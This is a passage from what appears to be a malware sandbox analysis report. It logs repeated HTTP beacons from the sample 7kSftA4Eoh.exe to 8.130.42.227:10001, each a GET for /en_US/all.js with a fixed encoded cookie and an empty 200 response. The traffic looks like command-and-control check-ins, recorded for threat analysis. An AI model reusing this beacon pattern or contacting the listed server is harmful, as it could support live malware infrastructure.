                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:42.535255909 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:42 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                36 | 192.168.2.4 | 49772 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:42.656169891 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:43.632132053 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:43 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                37 | 192.168.2.4 | 49773 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:43.747241974 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:44.697855949 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:44 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                38 | 192.168.2.4 | 49774 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:44.808901072 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:45.952497959 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:45 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                39 | 192.168.2.4 | 49775 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:46.076970100 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:47.050570011 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:46 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                40 | 192.168.2.4 | 49776 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:47.170264959 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:48.123918056 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:47 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                41 | 192.168.2.4 | 49777 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:48.249100924 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:49.197149992 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:49 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                42 | 192.168.2.4 | 49778 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:49.324487925 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:50.296108961 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:50 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                43 | 192.168.2.4 | 49779 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:50.402236938 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:51.369102955 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:51 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                44 | 192.168.2.4 | 49780 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:51.481307983 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:52.431555986 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:52 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                45 | 192.168.2.4 | 49782 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:52.542958975 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:53.539417028 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:53 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                46 | 192.168.2.4 | 49783 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:53.721587896 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:54.689713955 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:54 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                47 | 192.168.2.4 | 49784 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:54.810755968 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:55.758268118 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:55 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                48 | 192.168.2.4 | 49785 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:55.871373892 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:56.837666988 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:56 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                49 | 192.168.2.4 | 49786 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:56.949346066 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:58.517384052 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0
                                                                Oct 1, 2024 09:17:58.517575026 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:57 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                50 | 192.168.2.4 | 49787 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:58.640695095 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:59.583570004 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:59 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                51 | 192.168.2.4 | 49788 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:59.699615955 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:00.651453972 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:00 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                52 | 192.168.2.4 | 49789 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:00.763720036 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:01.725831985 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:01 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                53 | 192.168.2.4 | 49790 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:01.840148926 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:02.821022034 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:02 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                54 | 192.168.2.4 | 49791 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:02.933568954 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:03.911815882 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:03 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                55 | 192.168.2.4 | 49792 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:04.027379036 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:04.981847048 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:04 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                56 | 192.168.2.4 | 49793 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:05.105262995 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:06.064009905 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:05 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                57 | 192.168.2.4 | 49794 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:06.183608055 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:07.142935991 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:06 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                58 | 192.168.2.4 | 49795 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:07.263447046 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:08.247355938 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:08 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                59 | 192.168.2.4 | 49796 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:18:08.355396986 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:18:09.322186947 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:18:09 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                60 | 192.168.2.4 | 49797 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
